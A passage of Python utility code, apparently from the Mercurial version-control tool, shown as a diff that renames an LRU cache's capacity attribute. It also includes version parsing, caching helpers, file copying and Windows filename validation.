998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keywords args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220
1221 1221 def markempty(self):
1222 1222 """Mark the node as emptied."""
1223 1223 self.key = _notset
1224 1224
1225 1225 class lrucachedict(object):
1226 1226 """Dict that caches most recent accesses and sets.
1227 1227
1228 1228 The dict consists of an actual backing dict - indexed by original
1229 1229 key - and a doubly linked circular list defining the order of entries in
1230 1230 the cache.
1231 1231
1232 1232 The head node is the newest entry in the cache. If the cache is full,
1233 1233 we recycle head.prev and make it the new head. Cache accesses result in
1234 1234 the node being moved to before the existing head and being marked as the
1235 1235 new head node.
1236 1236 """
1237 1237 def __init__(self, max):
1238 1238 self._cache = {}
1239 1239
1240 1240 self._head = head = _lrucachenode()
1241 1241 head.prev = head
1242 1242 head.next = head
1243 1243 self._size = 1
1244 self._capacity = max
1244 self.capacity = max
1245 1245
1246 1246 def __len__(self):
1247 1247 return len(self._cache)
1248 1248
1249 1249 def __contains__(self, k):
1250 1250 return k in self._cache
1251 1251
1252 1252 def __iter__(self):
1253 1253 # We don't have to iterate in cache order, but why not.
1254 1254 n = self._head
1255 1255 for i in range(len(self._cache)):
1256 1256 yield n.key
1257 1257 n = n.next
1258 1258
1259 1259 def __getitem__(self, k):
1260 1260 node = self._cache[k]
1261 1261 self._movetohead(node)
1262 1262 return node.value
1263 1263
1264 1264 def __setitem__(self, k, v):
1265 1265 node = self._cache.get(k)
1266 1266 # Replace existing value and mark as newest.
1267 1267 if node is not None:
1268 1268 node.value = v
1269 1269 self._movetohead(node)
1270 1270 return
1271 1271
1272 if self._size < self._capacity:
1272 if self._size < self.capacity:
1273 1273 node = self._addcapacity()
1274 1274 else:
1275 1275 # Grab the last/oldest item.
1276 1276 node = self._head.prev
1277 1277
1278 1278 # At capacity. Kill the old entry.
1279 1279 if node.key is not _notset:
1280 1280 del self._cache[node.key]
1281 1281
1282 1282 node.key = k
1283 1283 node.value = v
1284 1284 self._cache[k] = node
1285 1285 # And mark it as newest entry. No need to adjust order since it
1286 1286 # is already self._head.prev.
1287 1287 self._head = node
1288 1288
1289 1289 def __delitem__(self, k):
1290 1290 node = self._cache.pop(k)
1291 1291 node.markempty()
1292 1292
1293 1293 # Temporarily mark as newest item before re-adjusting head to make
1294 1294 # this node the oldest item.
1295 1295 self._movetohead(node)
1296 1296 self._head = node.next
1297 1297
1298 1298 # Additional dict methods.
1299 1299
1300 1300 def get(self, k, default=None):
1301 1301 try:
1302 1302 return self._cache[k].value
1303 1303 except KeyError:
1304 1304 return default
1305 1305
1306 1306 def clear(self):
1307 1307 n = self._head
1308 1308 while n.key is not _notset:
1309 1309 n.markempty()
1310 1310 n = n.next
1311 1311
1312 1312 self._cache.clear()
1313 1313
1314 1314 def copy(self):
1315 result = lrucachedict(self._capacity)
1315 result = lrucachedict(self.capacity)
1316 1316
1317 1317 # We copy entries by iterating in oldest-to-newest order so the copy
1318 1318 # has the correct ordering.
1319 1319
1320 1320 # Find the first non-empty entry.
1321 1321 n = self._head.prev
1322 1322 while n.key is _notset and n is not self._head:
1323 1323 n = n.prev
1324 1324
1325 1325 for i in range(len(self._cache)):
1326 1326 result[n.key] = n.value
1327 1327 n = n.prev
1328 1328
1329 1329 return result
1330 1330
1331 1331 def _movetohead(self, node):
1332 1332 """Mark a node as the newest, making it the new head.
1333 1333
1334 1334 When a node is accessed, it becomes the freshest entry in the LRU
1335 1335 list, which is denoted by self._head.
1336 1336
1337 1337 Visually, let's make ``N`` the new head node (* denotes head):
1338 1338
1339 1339 previous/oldest <-> head <-> next/next newest
1340 1340
1341 1341 ----<->--- A* ---<->-----
1342 1342 | |
1343 1343 E <-> D <-> N <-> C <-> B
1344 1344
1345 1345 To:
1346 1346
1347 1347 ----<->--- N* ---<->-----
1348 1348 | |
1349 1349 E <-> D <-> C <-> B <-> A
1350 1350
1351 1351 This requires the following moves:
1352 1352
1353 1353 C.next = D (node.prev.next = node.next)
1354 1354 D.prev = C (node.next.prev = node.prev)
1355 1355 E.next = N (head.prev.next = node)
1356 1356 N.prev = E (node.prev = head.prev)
1357 1357 N.next = A (node.next = head)
1358 1358 A.prev = N (head.prev = node)
1359 1359 """
1360 1360 head = self._head
1361 1361 # C.next = D
1362 1362 node.prev.next = node.next
1363 1363 # D.prev = C
1364 1364 node.next.prev = node.prev
1365 1365 # N.prev = E
1366 1366 node.prev = head.prev
1367 1367 # N.next = A
1368 1368 # It is tempting to do just "head" here, however if node is
1369 1369 # adjacent to head, this will do bad things.
1370 1370 node.next = head.prev.next
1371 1371 # E.next = N
1372 1372 node.next.prev = node
1373 1373 # A.prev = N
1374 1374 node.prev.next = node
1375 1375
1376 1376 self._head = node
1377 1377
1378 1378 def _addcapacity(self):
1379 1379 """Add a node to the circular linked list.
1380 1380
1381 1381 The new node is inserted before the head node.
1382 1382 """
1383 1383 head = self._head
1384 1384 node = _lrucachenode()
1385 1385 head.prev.next = node
1386 1386 node.prev = head.prev
1387 1387 node.next = head
1388 1388 head.prev = node
1389 1389 self._size += 1
1390 1390 return node
1391 1391
1392 1392 def lrucachefunc(func):
1393 1393 '''cache most recent results of function calls'''
1394 1394 cache = {}
1395 1395 order = collections.deque()
1396 1396 if func.__code__.co_argcount == 1:
1397 1397 def f(arg):
1398 1398 if arg not in cache:
1399 1399 if len(cache) > 20:
1400 1400 del cache[order.popleft()]
1401 1401 cache[arg] = func(arg)
1402 1402 else:
1403 1403 order.remove(arg)
1404 1404 order.append(arg)
1405 1405 return cache[arg]
1406 1406 else:
1407 1407 def f(*args):
1408 1408 if args not in cache:
1409 1409 if len(cache) > 20:
1410 1410 del cache[order.popleft()]
1411 1411 cache[args] = func(*args)
1412 1412 else:
1413 1413 order.remove(args)
1414 1414 order.append(args)
1415 1415 return cache[args]
1416 1416
1417 1417 return f
1418 1418
1419 1419 class propertycache(object):
1420 1420 def __init__(self, func):
1421 1421 self.func = func
1422 1422 self.name = func.__name__
1423 1423 def __get__(self, obj, type=None):
1424 1424 result = self.func(obj)
1425 1425 self.cachevalue(obj, result)
1426 1426 return result
1427 1427
1428 1428 def cachevalue(self, obj, value):
1429 1429 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1430 1430 obj.__dict__[self.name] = value
1431 1431
1432 1432 def clearcachedproperty(obj, prop):
1433 1433 '''clear a cached property value, if one has been set'''
1434 1434 if prop in obj.__dict__:
1435 1435 del obj.__dict__[prop]
1436 1436
1437 1437 def increasingchunks(source, min=1024, max=65536):
1438 1438 '''return no less than min bytes per chunk while data remains,
1439 1439 doubling min after each chunk until it reaches max'''
1440 1440 def log2(x):
1441 1441 if not x:
1442 1442 return 0
1443 1443 i = 0
1444 1444 while x:
1445 1445 x >>= 1
1446 1446 i += 1
1447 1447 return i - 1
1448 1448
1449 1449 buf = []
1450 1450 blen = 0
1451 1451 for chunk in source:
1452 1452 buf.append(chunk)
1453 1453 blen += len(chunk)
1454 1454 if blen >= min:
1455 1455 if min < max:
1456 1456 min = min << 1
1457 1457 nmin = 1 << log2(blen)
1458 1458 if nmin > min:
1459 1459 min = nmin
1460 1460 if min > max:
1461 1461 min = max
1462 1462 yield ''.join(buf)
1463 1463 blen = 0
1464 1464 buf = []
1465 1465 if buf:
1466 1466 yield ''.join(buf)
1467 1467
1468 1468 def always(fn):
1469 1469 return True
1470 1470
1471 1471 def never(fn):
1472 1472 return False
1473 1473
1474 1474 def nogc(func):
1475 1475 """disable garbage collector
1476 1476
1477 1477 Python's garbage collector triggers a GC each time a certain number of
1478 1478 container objects (the number being defined by gc.get_threshold()) are
1479 1479 allocated even when marked not to be tracked by the collector. Tracking has
1480 1480 no effect on when GCs are triggered, only on what objects the GC looks
1481 1481 into. As a workaround, disable GC while building complex (huge)
1482 1482 containers.
1483 1483
1484 1484 This garbage collector issue have been fixed in 2.7. But it still affect
1485 1485 CPython's performance.
1486 1486 """
1487 1487 def wrapper(*args, **kwargs):
1488 1488 gcenabled = gc.isenabled()
1489 1489 gc.disable()
1490 1490 try:
1491 1491 return func(*args, **kwargs)
1492 1492 finally:
1493 1493 if gcenabled:
1494 1494 gc.enable()
1495 1495 return wrapper
1496 1496
1497 1497 if pycompat.ispypy:
1498 1498 # PyPy runs slower with gc disabled
1499 1499 nogc = lambda x: x
1500 1500
1501 1501 def pathto(root, n1, n2):
1502 1502 '''return the relative path from one place to another.
1503 1503 root should use os.sep to separate directories
1504 1504 n1 should use os.sep to separate directories
1505 1505 n2 should use "/" to separate directories
1506 1506 returns an os.sep-separated path.
1507 1507
1508 1508 If n1 is a relative path, it's assumed it's
1509 1509 relative to root.
1510 1510 n2 should always be relative to root.
1511 1511 '''
1512 1512 if not n1:
1513 1513 return localpath(n2)
1514 1514 if os.path.isabs(n1):
1515 1515 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1516 1516 return os.path.join(root, localpath(n2))
1517 1517 n2 = '/'.join((pconvert(root), n2))
1518 1518 a, b = splitpath(n1), n2.split('/')
1519 1519 a.reverse()
1520 1520 b.reverse()
1521 1521 while a and b and a[-1] == b[-1]:
1522 1522 a.pop()
1523 1523 b.pop()
1524 1524 b.reverse()
1525 1525 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1526 1526
1527 1527 # the location of data files matching the source code
1528 1528 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1529 1529 # executable version (py2exe) doesn't support __file__
1530 1530 datapath = os.path.dirname(pycompat.sysexecutable)
1531 1531 else:
1532 1532 datapath = os.path.dirname(pycompat.fsencode(__file__))
1533 1533
1534 1534 i18n.setdatapath(datapath)
1535 1535
1536 1536 def checksignature(func):
1537 1537 '''wrap a function with code to check for calling errors'''
1538 1538 def check(*args, **kwargs):
1539 1539 try:
1540 1540 return func(*args, **kwargs)
1541 1541 except TypeError:
1542 1542 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1543 1543 raise error.SignatureError
1544 1544 raise
1545 1545
1546 1546 return check
1547 1547
1548 1548 # a whilelist of known filesystems where hardlink works reliably
1549 1549 _hardlinkfswhitelist = {
1550 1550 'apfs',
1551 1551 'btrfs',
1552 1552 'ext2',
1553 1553 'ext3',
1554 1554 'ext4',
1555 1555 'hfs',
1556 1556 'jfs',
1557 1557 'NTFS',
1558 1558 'reiserfs',
1559 1559 'tmpfs',
1560 1560 'ufs',
1561 1561 'xfs',
1562 1562 'zfs',
1563 1563 }
1564 1564
1565 1565 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1566 1566 '''copy a file, preserving mode and optionally other stat info like
1567 1567 atime/mtime
1568 1568
1569 1569 checkambig argument is used with filestat, and is useful only if
1570 1570 destination file is guarded by any lock (e.g. repo.lock or
1571 1571 repo.wlock).
1572 1572
1573 1573 copystat and checkambig should be exclusive.
1574 1574 '''
1575 1575 assert not (copystat and checkambig)
1576 1576 oldstat = None
1577 1577 if os.path.lexists(dest):
1578 1578 if checkambig:
1579 1579 oldstat = checkambig and filestat.frompath(dest)
1580 1580 unlink(dest)
1581 1581 if hardlink:
1582 1582 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1583 1583 # unless we are confident that dest is on a whitelisted filesystem.
1584 1584 try:
1585 1585 fstype = getfstype(os.path.dirname(dest))
1586 1586 except OSError:
1587 1587 fstype = None
1588 1588 if fstype not in _hardlinkfswhitelist:
1589 1589 hardlink = False
1590 1590 if hardlink:
1591 1591 try:
1592 1592 oslink(src, dest)
1593 1593 return
1594 1594 except (IOError, OSError):
1595 1595 pass # fall back to normal copy
1596 1596 if os.path.islink(src):
1597 1597 os.symlink(os.readlink(src), dest)
1598 1598 # copytime is ignored for symlinks, but in general copytime isn't needed
1599 1599 # for them anyway
1600 1600 else:
1601 1601 try:
1602 1602 shutil.copyfile(src, dest)
1603 1603 if copystat:
1604 1604 # copystat also copies mode
1605 1605 shutil.copystat(src, dest)
1606 1606 else:
1607 1607 shutil.copymode(src, dest)
1608 1608 if oldstat and oldstat.stat:
1609 1609 newstat = filestat.frompath(dest)
1610 1610 if newstat.isambig(oldstat):
1611 1611 # stat of copied file is ambiguous to original one
1612 1612 advanced = (
1613 1613 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1614 1614 os.utime(dest, (advanced, advanced))
1615 1615 except shutil.Error as inst:
1616 1616 raise error.Abort(str(inst))
1617 1617
1618 1618 def copyfiles(src, dst, hardlink=None, progress=None):
1619 1619 """Copy a directory tree using hardlinks if possible."""
1620 1620 num = 0
1621 1621
1622 1622 def settopic():
1623 1623 if progress:
1624 1624 progress.topic = _('linking') if hardlink else _('copying')
1625 1625
1626 1626 if os.path.isdir(src):
1627 1627 if hardlink is None:
1628 1628 hardlink = (os.stat(src).st_dev ==
1629 1629 os.stat(os.path.dirname(dst)).st_dev)
1630 1630 settopic()
1631 1631 os.mkdir(dst)
1632 1632 for name, kind in listdir(src):
1633 1633 srcname = os.path.join(src, name)
1634 1634 dstname = os.path.join(dst, name)
1635 1635 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1636 1636 num += n
1637 1637 else:
1638 1638 if hardlink is None:
1639 1639 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1640 1640 os.stat(os.path.dirname(dst)).st_dev)
1641 1641 settopic()
1642 1642
1643 1643 if hardlink:
1644 1644 try:
1645 1645 oslink(src, dst)
1646 1646 except (IOError, OSError):
1647 1647 hardlink = False
1648 1648 shutil.copy(src, dst)
1649 1649 else:
1650 1650 shutil.copy(src, dst)
1651 1651 num += 1
1652 1652 if progress:
1653 1653 progress.increment()
1654 1654
1655 1655 return hardlink, num
1656 1656
1657 1657 _winreservednames = {
1658 1658 'con', 'prn', 'aux', 'nul',
1659 1659 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1660 1660 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1661 1661 }
1662 1662 _winreservedchars = ':*?"<>|'
1663 1663 def checkwinfilename(path):
1664 1664 r'''Check that the base-relative path is a valid filename on Windows.
1665 1665 Returns None if the path is ok, or a UI string describing the problem.
1666 1666
1667 1667 >>> checkwinfilename(b"just/a/normal/path")
1668 1668 >>> checkwinfilename(b"foo/bar/con.xml")
1669 1669 "filename contains 'con', which is reserved on Windows"
1670 1670 >>> checkwinfilename(b"foo/con.xml/bar")
1671 1671 "filename contains 'con', which is reserved on Windows"
1672 1672 >>> checkwinfilename(b"foo/bar/xml.con")
1673 1673 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1674 1674 "filename contains 'AUX', which is reserved on Windows"
1675 1675 >>> checkwinfilename(b"foo/bar/bla:.txt")
1676 1676 "filename contains ':', which is reserved on Windows"
1677 1677 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1678 1678 "filename contains '\\x07', which is invalid on Windows"
1679 1679 >>> checkwinfilename(b"foo/bar/bla ")
1680 1680 "filename ends with ' ', which is not allowed on Windows"
1681 1681 >>> checkwinfilename(b"../bar")
1682 1682 >>> checkwinfilename(b"foo\\")
1683 1683 "filename ends with '\\', which is invalid on Windows"
1684 1684 >>> checkwinfilename(b"foo\\/bar")
1685 1685 "directory name ends with '\\', which is invalid on Windows"
1686 1686 '''
1687 1687 if path.endswith('\\'):
1688 1688 return _("filename ends with '\\', which is invalid on Windows")
1689 1689 if '\\/' in path:
1690 1690 return _("directory name ends with '\\', which is invalid on Windows")
1691 1691 for n in path.replace('\\', '/').split('/'):
1692 1692 if not n:
1693 1693 continue
1694 1694 for c in _filenamebytestr(n):
1695 1695 if c in _winreservedchars:
1696 1696 return _("filename contains '%s', which is reserved "
1697 1697 "on Windows") % c
1698 1698 if ord(c) <= 31:
1699 1699 return _("filename contains '%s', which is invalid "
1700 1700 "on Windows") % stringutil.escapestr(c)
1701 1701 base = n.split('.')[0]
1702 1702 if base and base.lower() in _winreservednames:
1703 1703 return _("filename contains '%s', which is reserved "
1704 1704 "on Windows") % base
1705 1705 t = n[-1:]
1706 1706 if t in '. ' and n not in '..':
1707 1707 return _("filename ends with '%s', which is not allowed "
1708 1708 "on Windows") % t
1709 1709
1710 1710 if pycompat.iswindows:
1711 1711 checkosfilename = checkwinfilename
1712 1712 timer = time.clock
1713 1713 else:
1714 1714 checkosfilename = platform.checkosfilename
1715 1715 timer = time.time
1716 1716
1717 1717 if safehasattr(time, "perf_counter"):
1718 1718 timer = time.perf_counter
1719 1719
1720 1720 def makelock(info, pathname):
1721 1721 """Create a lock file atomically if possible
1722 1722
1723 1723 This may leave a stale lock file if symlink isn't supported and signal
1724 1724 interrupt is enabled.
1725 1725 """
1726 1726 try:
1727 1727 return os.symlink(info, pathname)
1728 1728 except OSError as why:
1729 1729 if why.errno == errno.EEXIST:
1730 1730 raise
1731 1731 except AttributeError: # no symlink in os
1732 1732 pass
1733 1733
1734 1734 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1735 1735 ld = os.open(pathname, flags)
1736 1736 os.write(ld, info)
1737 1737 os.close(ld)
1738 1738
1739 1739 def readlock(pathname):
1740 1740 try:
1741 1741 return os.readlink(pathname)
1742 1742 except OSError as why:
1743 1743 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1744 1744 raise
1745 1745 except AttributeError: # no symlink in os
1746 1746 pass
1747 1747 fp = posixfile(pathname, 'rb')
1748 1748 r = fp.read()
1749 1749 fp.close()
1750 1750 return r
1751 1751
1752 1752 def fstat(fp):
1753 1753 '''stat file object that may not have fileno method.'''
1754 1754 try:
1755 1755 return os.fstat(fp.fileno())
1756 1756 except AttributeError:
1757 1757 return os.stat(fp.name)
1758 1758
1759 1759 # File system features
1760 1760
1761 1761 def fscasesensitive(path):
1762 1762 """
1763 1763 Return true if the given path is on a case-sensitive filesystem
1764 1764
1765 1765 Requires a path (like /foo/.hg) ending with a foldable final
1766 1766 directory component.
1767 1767 """
1768 1768 s1 = os.lstat(path)
1769 1769 d, b = os.path.split(path)
1770 1770 b2 = b.upper()
1771 1771 if b == b2:
1772 1772 b2 = b.lower()
1773 1773 if b == b2:
1774 1774 return True # no evidence against case sensitivity
1775 1775 p2 = os.path.join(d, b2)
1776 1776 try:
1777 1777 s2 = os.lstat(p2)
1778 1778 if s2 == s1:
1779 1779 return False
1780 1780 return True
1781 1781 except OSError:
1782 1782 return True
1783 1783
1784 1784 try:
1785 1785 import re2
1786 1786 _re2 = None
1787 1787 except ImportError:
1788 1788 _re2 = False
1789 1789
1790 1790 class _re(object):
1791 1791 def _checkre2(self):
1792 1792 global _re2
1793 1793 try:
1794 1794 # check if match works, see issue3964
1795 1795 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1796 1796 except ImportError:
1797 1797 _re2 = False
1798 1798
1799 1799 def compile(self, pat, flags=0):
1800 1800 '''Compile a regular expression, using re2 if possible
1801 1801
1802 1802 For best performance, use only re2-compatible regexp features. The
1803 1803 only flags from the re module that are re2-compatible are
1804 1804 IGNORECASE and MULTILINE.'''
1805 1805 if _re2 is None:
1806 1806 self._checkre2()
1807 1807 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1808 1808 if flags & remod.IGNORECASE:
1809 1809 pat = '(?i)' + pat
1810 1810 if flags & remod.MULTILINE:
1811 1811 pat = '(?m)' + pat
1812 1812 try:
1813 1813 return re2.compile(pat)
1814 1814 except re2.error:
1815 1815 pass
1816 1816 return remod.compile(pat, flags)
1817 1817
1818 1818 @propertycache
1819 1819 def escape(self):
1820 1820 '''Return the version of escape corresponding to self.compile.
1821 1821
1822 1822 This is imperfect because whether re2 or re is used for a particular
1823 1823 function depends on the flags, etc, but it's the best we can do.
1824 1824 '''
1825 1825 global _re2
1826 1826 if _re2 is None:
1827 1827 self._checkre2()
1828 1828 if _re2:
1829 1829 return re2.escape
1830 1830 else:
1831 1831 return remod.escape
1832 1832
1833 1833 re = _re()
1834 1834
1835 1835 _fspathcache = {}
1836 1836 def fspath(name, root):
1837 1837 '''Get name in the case stored in the filesystem
1838 1838
1839 1839 The name should be relative to root, and be normcase-ed for efficiency.
1840 1840
1841 1841 Note that this function is unnecessary, and should not be
1842 1842 called, for case-sensitive filesystems (simply because it's expensive).
1843 1843
1844 1844 The root should be normcase-ed, too.
1845 1845 '''
1846 1846 def _makefspathcacheentry(dir):
1847 1847 return dict((normcase(n), n) for n in os.listdir(dir))
1848 1848
1849 1849 seps = pycompat.ossep
1850 1850 if pycompat.osaltsep:
1851 1851 seps = seps + pycompat.osaltsep
1852 1852 # Protect backslashes. This gets silly very quickly.
1853 1853 seps.replace('\\','\\\\')
1854 1854 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1855 1855 dir = os.path.normpath(root)
1856 1856 result = []
1857 1857 for part, sep in pattern.findall(name):
1858 1858 if sep:
1859 1859 result.append(sep)
1860 1860 continue
1861 1861
1862 1862 if dir not in _fspathcache:
1863 1863 _fspathcache[dir] = _makefspathcacheentry(dir)
1864 1864 contents = _fspathcache[dir]
1865 1865
1866 1866 found = contents.get(part)
1867 1867 if not found:
1868 1868 # retry "once per directory" per "dirstate.walk" which
1869 1869 # may take place for each patches of "hg qpush", for example
1870 1870 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1871 1871 found = contents.get(part)
1872 1872
1873 1873 result.append(found or part)
1874 1874 dir = os.path.join(dir, part)
1875 1875
1876 1876 return ''.join(result)
1877 1877
1878 1878 def checknlink(testfile):
1879 1879 '''check whether hardlink count reporting works properly'''
1880 1880
1881 1881 # testfile may be open, so we need a separate file for checking to
1882 1882 # work around issue2543 (or testfile may get lost on Samba shares)
1883 1883 f1, f2, fp = None, None, None
1884 1884 try:
1885 1885 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1886 1886 suffix='1~', dir=os.path.dirname(testfile))
1887 1887 os.close(fd)
1888 1888 f2 = '%s2~' % f1[:-2]
1889 1889
1890 1890 oslink(f1, f2)
1891 1891 # nlinks() may behave differently for files on Windows shares if
1892 1892 # the file is open.
1893 1893 fp = posixfile(f2)
1894 1894 return nlinks(f2) > 1
1895 1895 except OSError:
1896 1896 return False
1897 1897 finally:
1898 1898 if fp is not None:
1899 1899 fp.close()
1900 1900 for f in (f1, f2):
1901 1901 try:
1902 1902 if f is not None:
1903 1903 os.unlink(f)
1904 1904 except OSError:
1905 1905 pass
1906 1906
1907 1907 def endswithsep(path):
1908 1908 '''Check path ends with os.sep or os.altsep.'''
1909 1909 return (path.endswith(pycompat.ossep)
1910 1910 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1911 1911
1912 1912 def splitpath(path):
1913 1913 '''Split path by os.sep.
1914 1914 Note that this function does not use os.altsep because this is
1915 1915 an alternative of simple "xxx.split(os.sep)".
1916 1916 It is recommended to use os.path.normpath() before using this
1917 1917 function if need.'''
1918 1918 return path.split(pycompat.ossep)
1919 1919
1920 1920 def mktempcopy(name, emptyok=False, createmode=None):
1921 1921 """Create a temporary file with the same contents from name
1922 1922
1923 1923 The permission bits are copied from the original file.
1924 1924
